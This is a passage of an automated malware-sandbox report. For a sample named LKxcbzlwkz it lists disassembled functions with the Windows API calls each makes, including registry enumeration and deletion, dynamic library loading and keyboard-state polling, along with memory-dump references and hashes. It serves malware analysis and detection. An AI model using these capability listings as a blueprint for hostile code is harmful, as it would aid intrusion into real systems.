                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                            • Opcode ID: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                                                                                                                                                                                                                                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                                                                                                                            Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15295421-0
                                                                                                                                                                                                                                                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                                                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                                                                                                                                            Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2449869053-0
                                                                                                                                                                                                                                                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                                                                                                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                                                                                                                            Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3539004672-0
                                                                                                                                                                                                                                                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                                                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                                                                                                                                            Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 327565842-0
                                                                                                                                                                                                                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                                                                                                                            Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                                                                                                            Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2095303065-0
                                                                                                                                                                                                                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                                                                                                            Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: RectWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 861336768-0
                                                                                                                                                                                                                                                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                                                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                                                                                                                            Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00449598
                                                                                                                                                                                                                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1856069659-0
                                                                                                                                                                                                                                                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                                                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                                                                                                                                            Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1300944170-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                                                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                                                                                                            Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1822080540-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
